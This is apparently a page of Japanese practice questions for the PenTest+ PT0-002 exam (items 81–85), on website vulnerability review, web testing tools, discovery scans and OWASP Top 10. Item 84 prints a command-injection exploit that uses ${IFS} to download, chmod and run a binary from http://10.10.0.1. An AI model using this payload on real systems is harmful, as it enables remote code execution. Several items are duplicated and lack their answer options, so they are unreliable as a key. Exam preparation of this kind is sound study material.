PT0-002 試験問題 81
あなたは、Web ブラウザを通じてクライアントの Web サイトをレビューするペネトレーション テスターです。
手順
ブラウザを通じて Web サイトのすべてのコンポーネントを確認し、脆弱性が存在するかどうかを判断します。
証明書、ソース、Cookie のいずれかから最も高い脆弱性のみを修復します。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。







手順
ブラウザを通じて Web サイトのすべてのコンポーネントを確認し、脆弱性が存在するかどうかを判断します。
証明書、ソース、Cookie のいずれかから最も高い脆弱性のみを修復します。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。







PT0-002 試験問題 82
Web アプリケーションのセキュリティ評価を手動で実行するのに最も適したツールは次のうちどれですか? (2つお選びください。)
PT0-002 試験問題 83
ペネトレーション テスターがディスカバリー スキャンを実行したところ、次のものが生成されました。

上記の結果を生成し、さらなる分析のためにそれらをアクティブなホストのリストに変換するコマンドは次のどれですか?

上記の結果を生成し、さらなる分析のためにそれらをアクティブなホストのリストに変換するコマンドは次のどれですか?
PT0-002 試験問題 84
ペネトレーション テスターはエクスプロイトを使用してシステムにアクセスできました。以下は、使用されたコードの一部です。
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a" エクスプロイト += "HTTP/1.1" ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a" エクスプロイト += "HTTP/1.1" ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
PT0-002 試験問題 85
次の Web アプリケーションのセキュリティ リスクのうち、OWASP Top 10 v2017 に含まれるのはどれですか? (2つお選びください。)


